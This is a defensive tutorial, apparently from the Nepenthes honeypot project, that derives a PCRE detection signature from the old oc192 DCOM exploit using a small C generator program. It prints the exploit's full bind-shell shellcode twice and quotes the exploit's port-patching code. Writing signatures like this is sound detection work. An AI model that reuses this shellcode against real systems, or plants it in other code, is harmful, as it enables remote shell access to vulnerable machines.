How to create pcre patterns from POC Exploits

Foreword

The Exploit used here is quite old, not to say really old.
We decided to show how to create a pcre in no time, based on the dcom exploit by oc192.

Requirements

Getting Started

After downloading the exploit, we need to have a look at the shellcode used there.

The shellcode used is this:

/*
 * Shellcode array as quoted from the oc192 dcom exploit.  Two fields are
 * rewritten by the exploit at run time (see the excerpt further down):
 * the 4 bytes at index 36 (the per-target return address) and the 4 bytes
 * at index 471 (the bind port, XORed with 0x9432BF80).  A signature must
 * therefore treat those eight bytes as variable rather than literal.
 */
unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

Now we look up where and how the shellcode is changed to set the bind port and the offset.
We find:

    /* drg */   
    lportl=htons(lportl);
    memcpy(&lport[1], &lportl, 2);
    *(long*)lport = *(long*)lport ^ 0x9432BF80;
    memcpy(&sc[471],&lport,4);
 
    memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);

So

  • at ‘address’ 471, 4 bytes are changed to fit the port; we need this information
  • at ‘address’ 36, 4 bytes are changed too; we don't need this information

Now we create a mkpcre variant fitting these needs.

#include <stdbool.h>
#include <stdio.h>
 
/*
 * Byte string the pattern is generated from: a copy of the exploit's sc[]
 * array.  Indices listed in myhelper are emitted as wildcards instead of
 * literal bytes.  The NUL that the string literal appends is excluded by
 * main() via sizeof(data)-1.
 */
unsigned char data[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
 
 
/*
 * One run of bytes inside data[] that the exploit rewrites at run time
 * and that the generated pattern must therefore not match literally.
 */
typedef struct pcre_helper_tag {
  unsigned int  m_offset;        /* 0-based index of the first variable byte in data[] */
  unsigned int  m_size;          /* number of variable bytes in the run */
  bool          m_parenthesis;   /* wrap the run in ( ) so it becomes a capture group */
} pcre_helper;
 
 
/*
 * Patch table for the oc192 shellcode: the byte runs main() emits as
 * wildcards instead of literals.  Offsets are 0-based indices into data[].
 */
pcre_helper myhelper[] =
{
      /* return address chosen per target OS: 4 bytes at 36.  Not needed, so no capture group. */
      { .m_offset = 36,  .m_size = 4, .m_parenthesis = false },
      /* bind port: 4 bytes at 471.  Captured, because the port is recovered from the match. */
      { .m_offset = 471, .m_size = 4, .m_parenthesis = true  },
};
 
 
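/*
 * Return the myhelper entry covering byte index `i` of data[], or NULL when
 * the byte is fixed and must be matched literally.  The first matching entry
 * wins, so overlapping ranges produce a single wildcard per byte.
 */
static const pcre_helper *find_helper(size_t i)
{
        const size_t nhelpers = sizeof myhelper / sizeof myhelper[0];

        for (size_t j = 0; j < nhelpers; j++) {
                const pcre_helper *h = &myhelper[j];
                if (i >= h->m_offset && i < (size_t)h->m_offset + h->m_size) {
                        return h;
                }
        }
        return NULL;
}

/*
 * Print a PCRE that matches the byte string in data[]: one escaped byte per
 * column, 16 bytes per line.  Bytes listed in myhelper are emitted as `.`
 * wildcards; a run flagged m_parenthesis is wrapped in ( ) so the matched
 * bytes land in a capture group.
 *
 * Returns 0 on success and 1 when a myhelper range is empty or does not lie
 * inside data[]: such a range would never be hit and its bytes would be
 * emitted literally, yielding a pattern that silently never matches.
 */
int main(void)
{
        const size_t len = sizeof data - 1;                 /* drop the literal's NUL terminator */
        const size_t nhelpers = sizeof myhelper / sizeof myhelper[0];

        /* Validate the patch table before emitting anything. */
        for (size_t j = 0; j < nhelpers; j++) {
                const pcre_helper *h = &myhelper[j];
                if (h->m_size == 0 || h->m_offset > len || h->m_size > len - h->m_offset) {
                        fprintf(stderr, "helper %zu: range [%u, %u) is empty or outside data (%zu bytes)\n",
                                j, h->m_offset, h->m_offset + h->m_size, len);
                        return 1;
                }
        }

        for (size_t i = 0; i < len; i++) {
                const pcre_helper *h = find_helper(i);

                if (h == NULL) {
                        /* Literal byte.  The backslash is doubled so the text can be
                         * pasted into a C or config string and still read \xNN. */
                        printf("\\\\x%02X", data[i]);
                } else {
                        /* Variable byte.  NOTE: `.` does not match 0x0A unless the pattern
                         * is compiled with the dotall (`s`) option; patched bytes can take
                         * any value, so the consumer must set that option. */
                        if (h->m_parenthesis && i == h->m_offset) {
                                printf("(");
                        }
                        printf(".");
                        /* Closing on the last byte also handles a 1-byte run, which the
                         * old else-if chain left unclosed. */
                        if (h->m_parenthesis && i == (size_t)h->m_offset + h->m_size - 1) {
                                printf(")");
                        }
                }

                /* Wrap after every 16th byte, mirroring the layout of the source array. */
                if ((i + 1) % 16 == 0) {
                        printf("\n");
                }
        }
        /* Terminate a trailing partial line so the output ends with a newline. */
        if (len % 16 != 0) {
                printf("\n");
        }
        return 0;
}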

compile this variant (it is built as C++ here; a C compiler additionally needs `<stdbool.h>` for the `bool` type)

g++ -o oc192pre ocre192pcre.c

and run it

./oc192pre
\\x46\\x00\\x58\\x00\\x4E\\x00\\x42\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00
\\x4E\\x00\\x42\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00
\\x46\\x00\\x58\\x00....\\xCC\\xE0\\xFD\\x7F\\xCC\\xE0\\xFD\\x7F
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x19\\x5E\\x31\\xC9\\x81\\xE9\\x89\\xFF
\\xFF\\xFF\\x81\\x36\\x80\\xBF\\x32\\x94\\x81\\xEE\\xFC\\xFF\\xFF\\xFF\\xE2\\xF2
\\xEB\\x05\\xE8\\xE2\\xFF\\xFF\\xFF\\x03\\x53\\x06\\x1F\\x74\\x57\\x75\\x95\\x80
\\xBF\\xBB\\x92\\x7F\\x89\\x5A\\x1A\\xCE\\xB1\\xDE\\x7C\\xE1\\xBE\\x32\\x94\\x09
\\xF9\\x3A\\x6B\\xB6\\xD7\\x9F\\x4D\\x85\\x71\\xDA\\xC6\\x81\\xBF\\x32\\x1D\\xC6
\\xB3\\x5A\\xF8\\xEC\\xBF\\x32\\xFC\\xB3\\x8D\\x1C\\xF0\\xE8\\xC8\\x41\\xA6\\xDF
\\xEB\\xCD\\xC2\\x88\\x36\\x74\\x90\\x7F\\x89\\x5A\\xE6\\x7E\\x0C\\x24\\x7C\\xAD
\\xBE\\x32\\x94\\x09\\xF9\\x22\\x6B\\xB6\\xD7\\xDD\\x5A\\x60\\xDF\\xDA\\x8A\\x81
\\xBF\\x32\\x1D\\xC6\\xAB\\xCD\\xE2\\x84\\xD7\\xF9\\x79\\x7C\\x84\\xDA\\x9A\\x81
\\xBF\\x32\\x1D\\xC6\\xA7\\xCD\\xE2\\x84\\xD7\\xEB\\x9D\\x75\\x12\\xDA\\x6A\\x80
\\xBF\\x32\\x1D\\xC6\\xA3\\xCD\\xE2\\x84\\xD7\\x96\\x8E\\xF0\\x78\\xDA\\x7A\\x80
\\xBF\\x32\\x1D\\xC6\\x9F\\xCD\\xE2\\x84\\xD7\\x96\\x39\\xAE\\x56\\xDA\\x4A\\x80
\\xBF\\x32\\x1D\\xC6\\x9B\\xCD\\xE2\\x84\\xD7\\xD7\\xDD\\x06\\xF6\\xDA\\x5A\\x80
\\xBF\\x32\\x1D\\xC6\\x97\\xCD\\xE2\\x84\\xD7\\xD5\\xED\\x46\\xC6\\xDA\\x2A\\x80
\\xBF\\x32\\x1D\\xC6\\x93\\x01\\x6B\\x01\\x53\\xA2\\x95\\x80\\xBF\\x66\\xFC\\x81
\\xBE\\x32\\x94\\x7F\\xE9\\x2A\\xC4\\xD0\\xEF\\x62\\xD4\\xD0\\xFF\\x62\\x6B\\xD6
\\xA3\\xB9\\x4C\\xD7\\xE8\\x5A\\x96(....)\\x4C\\xD5\\x24\\xC5\\xD3
\\x40\\x64\\xB4\\xD7\\xEC\\xCD\\xC2\\xA4\\xE8\\x63\\xC7\\x7F\\xE9\\x1A\\x1F\\x50
\\xD7\\x57\\xEC\\xE5\\xBF\\x5A\\xF7\\xED\\xDB\\x1C\\x1D\\xE6\\x8F\\xB1\\x78\\xD4
\\x32\\x0E\\xB0\\xB3\\x7F\\x01\\x5D\\x03\\x7E\\x27\\x3F\\x62\\x42\\xF4\\xD0\\xA4
\\xAF\\x76\\x6A\\xC4\\x9B\\x0F\\x1D\\xD4\\x9B\\x7A\\x1D\\xD4\\x9B\\x7E\\x1D\\xD4
\\x9B\\x62\\x19\\xC4\\x9B\\x22\\xC0\\xD0\\xEE\\x63\\xC5\\xEA\\xBE\\x63\\xC5\\x7F
\\xC9\\x02\\xC5\\x7F\\xE9\\x22\\x1F\\x4C\\xD5\\xCD\\x6B\\xB1\\x40\\x64\\x98\\x0B
\\x77\\x65\\x6B\\xD6\\x93\\xCD\\xC2\\x94\\xEA\\x64\\xF0\\x21\\x8F\\x32\\x94\\x80
\\x3A\\xF2\\xEC\\x8C\\x34\\x72\\x98\\x0B\\xCF\\x2E\\x39\\x0B\\xD7\\x3A\\x7F\\x89
\\x34\\x72\\xA0\\x0B\\x17\\x8A\\x94\\x80\\xBF\\xB9\\x51\\xDE\\xE2\\xF0\\x90\\x80
\\xEC\\x67\\xC2\\xD7\\x34\\x5E\\xB0\\x98\\x34\\x77\\xA8\\x0B\\xEB\\x37\\xEC\\x83
\\x6A\\xB9\\xDE\\x98\\x34\\x68\\xB4\\x83\\x62\\xD1\\xA6\\xC9\\x34\\x06\\x1F\\x83
\\x4A\\x01\\x6B\\x7C\\x8C\\xF2\\x38\\xBA\\x7B\\x46\\x93\\x41\\x70\\x3F\\x97\\x78
\\x54\\xC0\\xAF\\xFC\\x9B\\x26\\xE1\\x61\\x34\\x68\\xB0\\x83\\x62\\x54\\x1F\\x8C
\\xF4\\xB9\\xCE\\x9C\\xBC\\xEF\\x1F\\x84\\x34\\x31\\x51\\x6B\\xBD\\x01\\x54\\x0B
\\x6A\\x6D\\xCA\\xDD\\xE4\\xF0\\x90\\x80\\x2F\\xA2\\x04

This is a perfect pcre to match the oc192 bindshell exploit.
The port is in pcre_substring #1.
Note that a `.` in the pattern does not match a newline byte (0x0A) unless the pattern is compiled with the dotall (`s`) option; since the patched bytes can take any value, compile it with that option.
To get the port in network byte order we have to xor the captured bytes again with 0x9432BF80,
as stated here

    *(long*)lport = *(long*)lport ^ 0x9432BF80;
1) Part of the Nepenthes distribution - have a look in tools/.
 